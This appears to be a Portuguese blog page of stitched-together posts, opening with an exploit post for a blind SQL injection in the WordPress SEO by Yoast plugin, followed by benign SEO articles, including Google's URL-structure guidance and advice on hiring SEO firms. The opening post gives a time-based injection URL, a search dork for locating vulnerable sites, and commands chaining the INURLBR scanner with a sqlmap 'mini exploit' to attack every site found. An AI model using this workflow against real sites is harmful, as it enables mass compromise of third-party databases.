WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection / MINI EXPLOIT SQLMAP + SCANNER INURLBR

O WordPress SEO by Yoast plugin é usado por milhões de sites WordPress que querem ser encontrados na internet. O WordPress SEO by Yoast plugin é plugin gratuito voltado para otimização de sites para motores de busca, com intuito de aumentar seu ranking page em motores.

Descrição Técnica:

A vulnerabilidade de injeção blind SQL autenticado pode ser encontrado dentro do arquivo'admin/class-bulk-editor-list-table.php'. Os parâmetros GET order by e ordem não são suficientemente higienizado antes de serem usados dentro de uma consulta SQL.

Line 529:

$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field( $_GET['orderby'] ) ) : 'post_title';

Line 533:

order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );


Proof of Concept (PoC):
O seguinte pedido GET fará com que a consulta SQL possa executar e dormir por 10 segundos, se clicou no como um administrador autenticado, editor ou usuário autor.

http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc


DORK: inurl:admin.php?page=wpseo_bulk

Desenvolvi um mini exploit para ser executado junto com SCANNER INURLBR ou separadamente via da sua preferencia usando sqlmap para tal exploração.
O scanner INURLBR fará toda busca e em seguida o mine exploit vai explorá-lo com sqlmap.

Otimização:
FULL: http://pastebin.com/gi1Q4NmQ

EXECUTE MINI EXPLOIT: php mini_exploit.php www.target.com.br
COMANDO INURLBR:
./inurlbr.php --dork 'inurl:admin.php?page=wpseo_bulk' -s seo.txt -q 1,6 --comand-all "php mini_exploit.php _TARGET_" 

REF:
https://wpvulndb.com/vulnerabilities/7841
http://cyberwarzone.com/sql-vulnerability-in-wordpress-seo-by-yoast-patch-immediatly/

A maior mentira cometida por empresas de SEO

Nós prometemos colocar o seu site em primeiro no Google em X dias…A nossa empresa possui uma parceria direta com o Google, garantimos a primeira página…Promessas falsas de SEO, apenas para arrancar dinheiro de donos de sites mal informados são muito comuns pela internet. Saiba aqui como identificar as falsas empresas de SEO, que prometem mundos e fundos, e não cumprem.Em primeiro lugar, não existe ainda um curso/graduação específico/a de SEO, então todos aqueles que trabalham com otimização de sites para o Google (incluindo eu), aprenderam por experiências vividas em seus próprios sites.
Muitas são as empresas ou profissionais de SEO, que prometem mundos e fundos, prometem o primeiro lugar no Google, dão inclusive um prazo para isto acontecer. Esse é a maior mentira cometida por empresas de SEO, prometerem algo que não está ao seu alcance. Quem decide colocar os sites em primeiro ou em último é o Google, e unicamente o Google. Todo o trabalho de SEO, é para tentar mostrar a ele, que o seu site é relevante e possui um bom conteúdo.

Prometemos o 1º lugar do Google:

Isto não existe, quem decide acerca disto é o Google. O que podemos fazer como profissionais, e melhorar o teu site, e mostrar ao Google que ele é bom o suficiente para estar em primeiro.
Acontece que, algumas empresas inserem o teu site nos resultados pagos do Google, que são aqueles “links patrocinados” (Google Adwords – SEM) que aparecem acima e ao lado dos resultados orgânicos. Como estes links são pagos, você até irá conseguir estar em primeiro no Google, mas pagará um valor elevado. E o maior problema é…parou de pagar, parou de aparecer.
Já os resultados orgânicos (naturais) do Google, são oscilantes e extremamente dinâmicos…hoje, um site pode estar em primeiro, amanha pode perder algumas posições. O Google, sempre procura trazer o melhor para o usuário, então se ele considerar que um site é melhor que outro, ele troca as suas posições. E isto, acontece com todos os termos de pesquisa.

Temos uma parceria com o Google, garantimos o seu site

Está é particularmente a que eu mais acho engraçado..rsrsrs. Qual vantagem o Google tem numa parceria desta? É só pensar..! Novamente, quando uma empresa promete isto, está se referindo ao Google Adwords, que é um serviço aberto do Google.
Considerações Finais:

• O Google em nenhum momento vende posições, um site só aparece bem por lá se ele merecer…não existe corrupção nisto.
• Ninguém pode garantir as primeiras posições, pois não depende exclusivamente do seu trabalho, mas depende também do conteúdo do site, da procura do usuário e principalmente do Google.
• Para divulgar instantaneamente o seu site no Google, algumas empresas usam como estratégia o Google Adwords (os links patrocinados). Tenham em mente, que você não precisa pagar a ninguém para fazer este serviço, entretanto, um profissional de marketing digital sabe como usar esta ferramenta da melhor forma possível…

Enfim, quer realmente ganhar visitas do Google? Fuja de empresas falsas, e procure sempre produzir conteúdo relevante em seu site….

Fonte:http://www.lucaspeperaio.com.br/

Statsgram: descubra informações de qualquer site da web.

Statsgram: descubra  informações de qualquer site da web.

Info referente: DNS,HTML,TAGS,VISITANTES,SCRIPTS e outros.

e você possui um site, blog ou apenas deseja pesquisar um pouco mais a respeito de algum endereço da web, o Statsgram te ajuda a obter diversas informações de uma maneira simples, rápida e gratuita. 

Trata-se de um serviço web que, em segundos, lhe dá várias estatísticas de um site ou blogapenas digitando a URL que você deseja pesquisar, sem qualquer tipo de registro prévio.

Quando você realiza uma pesquisa no Statsgram, um relatório é emitido com diversos dados, como, por exemplo, o número de visitantes por dia, local do servidor, um mapa que mostra a localização mundial dos visitantes da página, sites semelhantes etc. Detalhes um pouco mais profundos também são mostrados, como as buscas mais populares realizadas dentro do site, por exemplo.

Os números são estimados, portanto, podem não ser muito corretos às vezes. Mas, de qualquer maneira, não deixa de ser uma ferramenta interessante.

Acessar:http://statsgram.com

Como criar uma estrutura de URLs compatível com o Google

Como criar uma estrutura de URLs compatível com o Google

A estrutura de URLs de um site deve ser a mais simples possível. Considere a organização do seu conteúdo de forma que os URLs sejam construídos logicamente e da maneira mais compreensível para os usuários (quando possível, use palavras legíveis no lugar de longos números de ID). Por exemplo, se estiver procurando informações sobre aviação, um URL como http://en.wikipedia.org/wiki/Aviation ajudará você a decidir se desejar clicar nesse link. Um URL como http://www.exemplo.com.br.br/indice.php?id_sezione=360&sid=3a5ebc944f41daa6f849f730f1 é menos atraente para usuários.
Use pontuação em seus URLs. O URLhttp://www.exemplo.com.br/vestido-verde.html é mais útil para nós quehttp://www.exemplo.com.br/vestidoverde.html Recomendamos que você use hífens (-) em vez de sublinhados (_) em seus URLs.
URLs muito complexos, especialmente os que contém vários parâmetros, podem causar problemas para os rastreadores, criando números desnecessariamente altos de URLs que apontam para um conteúdo idêntico ou semelhante em seu site. Como resultado, o Googlebot pode consumir mais largura de banda do que o necessário, ou pode não indexar completamente todo o conteúdo do site.
Causas comuns desse problema
Um número desnecessariamente alto de URLs pode ser causado por vários problemas. Entre eles:

• Filtragem aditiva de um conjunto de itens Vários sites oferecem diferentes modos de exibição do mesmo conjunto de itens ou resultados de pesquisa, e muitas vezes permitem que o usuário filtre esse conjunto usando um critério definido (por exemplo: mostre me hotéis na praia). Quando os filtros podem ser combinados de maneira aditiva (por exemplo: hotéis na praia e com academia de ginástica), o número de URLs (modos de exibição de dados) nos sites explodirá. A criação de um grande número de listas de hotéis com diferenças sutis é redundante, pois o Googlebot precisa ver somente um número pequeno de listas a partir das quais ele pode atingir a página de cada hotel. Por exemplo:
  • propriedades do hotel em "classificações de valor":

    http://www.exemplo.com.br/resultados-de-pesquisa-hotel.jsp?Ne=292&N=461

  • Propriedades do hotel em "classificações de valor" na praia:

    http://www.exemplo.com.br/resultados-de-pesquisa-hotel.jsp?Ne=292&N=461+4294967240

  • Propriedades do hotel em "classificações de valor" na praia e com sala de ginástica:

    http://www.exemplo.com.br/resultados-de-pesquisa-hotel.jsp?Ne=292&N=461+4294967240+4294967270

• Geração dinâmica de documentos. Isso pode resultar em pequenas alterações por causa dos contadores, registros de hora ou anúncios.
• Parâmetros problemáticos no URL.As IDs de sessão, por exemplo, podem criar uma imensa quantidade de duplicação e um número maior ainda de URLs.
• Classificando parâmetros.Alguns grandes sites de compra oferecem várias maneiras de classificar alguns itens, o que resulta em um número muito maior de URLs. Por exemplo:

  http://www.exemplo.com.br/resultados?pesquisa_tipo=pesquisa_videos&pesquisa_consulta=tpb&pesquisa_classificar=relevancia&pesquisa_categoria=25

• Parâmetros irrelevantes no URL, como parâmetros de referência. Por exemplo:

  http://www.exemplo.com.br/pesquisa/semcabecalhos?clique=6EE2BF1AF6A3D705D5561B7C3564D9C2&cliquepagina=OPD+Produto+Pagina&cat=79

  http://www.exemplo.com.br/discussao/mostrarthread.php?referrerid=249406threadid=535913

  http://www.exemplo.com.br/produtos/produtos.asp?N=200063&Ne=500955&ref=foo%2Cbar&Cn=Accessorios.

• Problemas de agenda. Uma agenda gerada de maneira dinâmica pode gerar links para datas passadas e futuras sem restrições quanto às datas de início ou final. Por exemplo:

  http://www.exemplo.com.br/agenda.php?d=13&m=8&y=2011

  http://www.exemplo.com.br/agenda/cgi?2008mes=jan

• Links relativos quebrados.Links relativos quebrados muitas vezes causam espaços infinitos. Geralmente, esse problema ocorre devido a elementos de caminhos repetitivos. Por exemplo:

  http://www.exemplo.com.br/indice.shtml/discussao/categoria/escola/061121/html/entrevista/categoria/saude/070223/html/categoria/business/070302/html/categoria/comunidade/070413/html/FAQ.htm

Etapas para solucionar esse problema
Para evitar possíveis problemas com a estrutura do URL, é recomendável fazer o seguinte:

• Considere usar um arquivo robots.txt para bloquear o acesso do Googlebot a URLs problemáticos. Normalmente, você deve bloquear os URLs dinâmicos, como aqueles que geram resultados de pesquisa que podem criar espaços infinitos, como agendas. O uso de expressões comuns em seu arquivo robots.txt pode permitir que você bloqueie um grande número de URLs facilmente.
• Sempre que possível, evite usar IDs de sessão em URLs. Em vez disso, use cookies. Para obter mais informações, consulte nossas Diretrizes para webmasters.
• Sempre que possível, abrevie URLs extinguindo parâmetros desnecessários.
• Se o seu site tiver uma agenda infinita, inclua um atributo "nofollow" aos links para páginas de agenda criadas de maneira dinâmica no futuro.
• Verifique se há links relativos quebrados em seu site.

Fonte: http://support.google.com/webmasters/bin/answer.py?hl=pt-BR&answer=76329

Otimização de sites para Mecanismos de Pesquisa (SEO)

Otimização de sites para Mecanismos de Pesquisa (SEO)

- Guia do Google para Iniciantes -

Bem-vindo ao Guia do Google para Iniciantes em Otimização de sites para Mecanismos de Pesquisa.

Este documento começou como um esforço para ajudar equipes dentro do Google, mas pensamos

que seria igualmente útil para webmasters iniciantes no assunto e que pretendam melhorar a

interação de seus sites com usuários e mecanismos de pesquisa. Embora este guia não lhe contará

quaisquer segredos que façam com que seu site seja automaticamente classificado como primeiro

resultado nas pesquisas no Google (desculpe!), utilizar as práticas recomendadas definidas abaixo irá

facilitar aos mecanismos de pesquisa rastrear e indexar o seu conteúdo.

A Otimização para Mecanismos de Pesquisa pode muitas vezes se resumir a pequenas modificações

em partes do seu site. Quando vistas isoladamente, essas mudanças podem parecer como uma

pequena melhoria, mas quando combinadas com outras otimizações, podem representar um impacto

significativo na experiência do usuário e no desempenho nos resultados de pesquisa orgânica. Você

provavelmente já está familiarizado com muitos dos tópicos abordados este guia, pois eles são os

ingredientes básicos para páginas da web, mas talvez não esteja obtendo o máximo proveito deles. 

Otimizar para Mecanismos de Pesquisa afeta apenas os resultados da pesquisa orgânica,

não alterando os resultados pagos ou "patrocinados", tais como o Google AdWords

Otimização de sites para Mecanismos de Pesquisa (SEO) - Guia do Google para IniciantesApesar de este guia conter as palavras "mecanismo de pesquisa", gostaríamos de salientar que você

deveria basear suas decisões de otimização tendo em vista primeiramente e principalmente o que é

melhor para os visitantes de seu site. Eles são os principais consumidores do seu conteúdo e estão

usando os mecanismos de pesquisa para encontrar o seu trabalho. Um enfoque demasiado estrito

em ajustes específicos para obter melhor classificação nos resultados orgânicos dos mecanismos de

pesquisa pode causar resultados indesejados. Otimizar para mecanismos de pesquisa significa dar

relevância ao que seu site tem de melhor no quesito visibilidade nos mecanismos de pesquisa. 

Para ajudar nas explicações, criamos um site fictício que nos acompanhará durante todo o guia. Para

cada tópico, apresentaremos a informação necessária sobre o site para ilustrar o tópico abordado.

Veja aqui algumas informações sobre o site que usaremos:

● Website/Nome do negócio: "Brandon's Baseball Cards" (Figurinhas de Beisebol de Brandon)

● Nome do domínio: brandonsbaseballcards.com

● Foco: Venda online de figurinhas de beisebol, tabela de preços, artigos e notícias

● Tamanho: Pequeno, aproximadamente 250 páginas

O seu site pode ser menor ou maior do que este e oferecer conteúdo completamente diferente, mas

os temas de otimização que discutiremos a seguir são aplicável a sites de todos os tipos e tamanhos.

Esperamos que nosso guia lhe proporcione algumas idéias novas sobre como melhorar o seu site, e

adoraríamos ouvir suas perguntas, comentários e histórias de sucesso no Grupo de Ajuda a

Webmasters do Google. 

Fonte: http://static.googleusercontent.com/external_content/untrusted_dlcp/www.google.com/pt-BR//intl/pt-BR/webmasters/docs/guia-otimizacao-para-mecanismos-de-pesquisa-pt-br.pdf

Vamos falar de SEO

Vamos falar de SEO.. logo abaixo segui um material encontrado no site do google parte de SEO.
Quem melhor pra falar de SEO do que a google certo.

SEO é o acrônimo em inglês de "otimização do mecanismo de pesquisa" ou "otimizador do mecanismo de pesquisa". A contratação de um SEO é uma decisão importante que pode aperfeiçoar seu site e poupar tempo, mas você também corre o risco de prejudicar seu site e sua reputação. Pesquise as vantagens potenciais, bem como os danos que um SEO irresponsável pode causar ao seu site. Muitos SEOs e outros consultores e agências oferecem serviços úteis para proprietários de sites, incluindo:

• Análise do conteúdo ou da estrutura do seu site
• Consultoria técnica sobre desenvolvimento de sites: por exemplo, hospedagem, redirecionamentos, páginas de erro, uso do JavaScript
• Desenvolvimento de conteúdo
• Gerenciamento de campanhas de desenvolvimento de negócios on-line
• Pesquisa de palavras-chave
• Treinamento de SEO
• Experiência em regiões e mercados específicos.

A página de resultados do Google inclui resultados de pesquisa orgânicos e, frequentemente, publicidade paga (indicada pelo título "Links patrocinados") também. Anunciar no Google não terá qualquer efeito na presença do seu site em nossos resultados de pesquisa. O Google nunca aceita dinheiro para incluir ou classificar sites nos resultados de pesquisa; não há custos para aparecer em nossos resultados de pesquisa orgânicos. Recursos gratuitos, como as Ferramentas do Google para webmasters, o blog da Central do webmaster oficial e o fórum de discussão, podem oferecer excelentes informações sobre como otimizar seu site para pesquisa orgânica. Muitas dessas fontes gratuitas, além de informações sobre pesquisa paga, podem ser encontradas na Central do webmaster do Google.
Antes de iniciar sua pesquisa por um SEO, é recomendável tornar-se um consumidor informado e se familiarizar com o modo como os mecanismos de pesquisa funcionam. Recomendamos iniciar aqui:

• Diretrizes do Google para webmasters
• Conceitos básicos do Google: como o Google rastreia, indexa e publica na web.

Se você estiver pensando em contratar um SEO, quanto antes melhor. Um bom momento para a contratação é quando você estiver pensando em mudar o design do site ou planejando lançar um novo site. Dessa maneira, você e o seu SEO podem garantir que o seu site seja criado para ser conveniente para mecanismos de pesquisa do início ao fim. Porém, um bom SEO também pode ajudar a melhorar um site existente.
Algumas perguntas úteis a serem feitas a um SEO incluem

• Você pode me mostrar exemplos de trabalhos anteriores e compartilhar algumas histórias de sucesso?
• Você segue as Diretrizes do Google para webmasters?
• Você oferece algum serviço ou orientação de marketing para complementar o seu negócio de pesquisa orgânico?
• Que tipo de resultados você espera ver e em que período de tempo? Como você mede seu sucesso?
• Qual é a sua experiência no meu setor?
• Qual é a sua experiência no meu país ou em minha cidade?
• Qual é a sua experiência no desenvolvimento de sites internacionais?
• Quais são suas técnicas mais importantes de SEO?
• Há quanto tempo você está no mercado?
• Como me comunicarei com você? Você me informará sobre todas as alterações feitas no meu site e fornecerá informações detalhadas sobre suas recomendações e a lógica por trás delas?

Embora os SEOs possam oferecer serviços valiosos aos clientes, alguns SEOs com comportamentos antiéticos são vistos com maus olhos no setor por suas práticas de marketing exageradamente agressivas e suas tentativas de manipular de forma inadequada os resultados dos mecanismos de pesquisa. Práticas que violam nossas diretrizes podem resultar em um ajuste negativo da presença do seu site no Google ou até mesmo na remoção do site do nosso índice. Veja alguns aspectos a serem considerados:

• Tenha cuidado com firmas de SEO e consultores ou agências na web que enviam e-mails inesperados.Pode parecer incrível, mas nós também recebemos este tipo de spam:
  

  "Prezado google.com.br,
  Visitamos o seu site e constatamos que você não aparece na maioria dos principais diretórios e mecanismos de pesquisa..."

  Se você receber e-mails não solicitados sobre mecanismos de pesquisa, mantenha o mesmo ceticismo que teria em relação a pílulas dietéticas que "queimam a gordura enquanto você dorme" ou solicitações para ajudar a transferir o dinheiro de ditadores depostos.
• Ninguém pode garantir a classificação em primeiro lugar no Google.Cuidado com os SEOs que dizem garantir a sua classificação ou ter um "relacionamento privilegiado" com o Google ou que anunciam um "envio prioritário" para o Google. Não existe envio prioritário para o Google. Na verdade, a única forma de enviar um site diretamente ao Google é por meio da página Envie seu conteúdo ou enviando um Sitemap, e você pode fazer isso por conta própria sem custo algum.
• Tome cuidado se uma empresa tiver muitos segredos ou não explicar claramente o que pretende.Se algo não estiver claro, peça explicações. Se um SEO criar um conteúdo fraudulento ou enganoso em seu nome, como páginas de entrada ou domínios "descartáveis", o seu site poderá ser removido do índice do Google. Em última análise, você é responsável pelas ações das empresas que contratar. Por isso, é melhor verificar exatamente como pretendem "ajudar" você. Se um SEO possui acesso ao FTP do seu servidor, ele deve explicar todas as alterações que estão sendo feitas no seu site.
• Você nunca deve precisar ter um link para um SEO.Evite SEOs que falam do poder dos links "gratuitos e para todos", de esquemas de popularidade de links ou que enviam o seu site para milhares de mecanismos de pesquisa. Normalmente, essas ações são inúteis e não afetam a sua classificação nos resultados dos principais mecanismos de pesquisa; ao menos, não de uma forma que você consideraria positiva.
• Escolha com cuidado.Em caso de dúvida em relação a um determinado SEO, pesquise o mercado. Evidentemente, você pode fazer isso no Google. Você também pode consultar algumas informações que saíram na imprensa, inclusive este artigo em inglês sobre um SEO especialmente agressivo:http://seattletimes.nwsource.com/html/businesstechnology/2002002970_nwbizbriefs12.html. Embora o Google não comente sobre empresas específicas, encontramos firmas que se autodenominam SEOs, as quais adotam práticas que obviamente ultrapassam o comportamento comercialmente aceitável. Tome cuidado.
• Tente entender para onde o dinheiro está indo.O Google nunca vende as melhores classificações nos seus resultados de pesquisa, mas existem vários mecanismos de pesquisa que combinam os resultados de pesquisa normais com resultados pagos por clique ou por inclusão. Alguns SEOs prometem que você ocupará as primeiras posições nos mecanismos de pesquisa, mas na verdade aparecerá na seção de anúncios, e não nos resultados de pesquisa. Alguns SEOs chegam até a alterar o valor dos lances em tempo real para criar a ilusão de que "controlam" outros mecanismos de pesquisa e que podem escolher onde querem aparecer. Esse golpe não funciona com o Google, pois os nossos anúncios são identificados de forma clara e ficam separados dos nossos resultados de pesquisa. Mas pergunte ao seu SEO em potencial quais taxas se destinam à inclusão permanente e quais se destinam a anúncios temporários.
• Quais são os abusos mais comuns que o proprietário de um site pode encontrar?
Um golpe comum é a criação de domínios "de fachada", que encaminham os usuários para um site por meio de redirecionamentos fraudulentos. Os domínios de fachada normalmente pertencem a um SEO que alega estar trabalhando em nome de um cliente. No entanto, se o relacionamento não vingar, o SEO poderá apontar o domínio para outro site ou até mesmo para o domínio de um concorrente. Se isso acontecer, o cliente pagou para criar um site concorrente que pertence ao SEO. Outra prática ilícita é colocar páginas "de entrada" carregadas de palavras-chave em algum lugar do site do cliente. O SEO promete que isso tornará a página mais relevante para um maior número de consultas. Essa afirmação é inerentemente falsa, já que uma única página é raramente relevante para várias palavras-chave. Pior ainda é que essas páginas de entrada frequentemente contêm links ocultos que levam também a outros clientes do SEO. Tais páginas de entrada sugam a popularidade dos links do site e encaminham para o SEO e seus outros clientes, que podem ter sites com conteúdo ilegal ou ofensivo.
• Que outras coisas eu devo verificar?
Alguns sinais de alerta podem indicar que você está lidando com um SEO desonesto. Esta não é uma lista completa, por isso, em caso de dúvida, siga o seu instinto. E, principalmente, não pense duas vezes em desistir se o seu SEO:
• tiver domínios de fachada
• colocar links para outros clientes nas páginas de entrada
• oferecer a venda de palavras-chave na barra de endereços
• não distinguir entre verdadeiros resultados de pesquisa e anúncios exibidos nos resultados de pesquisa
• garantir a classificação, mas somente para frases de palavras-chave longas e obscuras, que você obteria de qualquer forma
• utilizar diversos aliases ou informações WHOIS falsas
• obtiver tráfego a partir de "falsos" mecanismos de pesquisa, spyware ou scumware
• tiver tido domínios excluídos do índice do Google ou se ele mesmo não estiver listado no Google
Se você achar que foi enganado por um SEO, convém denunciar o fato. Nos Estados Unidos, a FTC (Comissão Federal de Comércio) cuida das reclamações relacionadas a práticas comerciais enganosas ou ilegais. Para registrar uma reclamação, acesse:http://www.ftc.gov/ e clique em "File a Complaint Online" (Registrar uma reclamação on-line), ligue para             1-877-FTC-HELP       ou escreva para:

Federal Trade Commission CRC-240 Washington, D.C. 20580

Se a sua reclamação for contra uma empresa em outro país, registre-a emhttp://www.econsumer.gov/.

atualizado 03/09/2012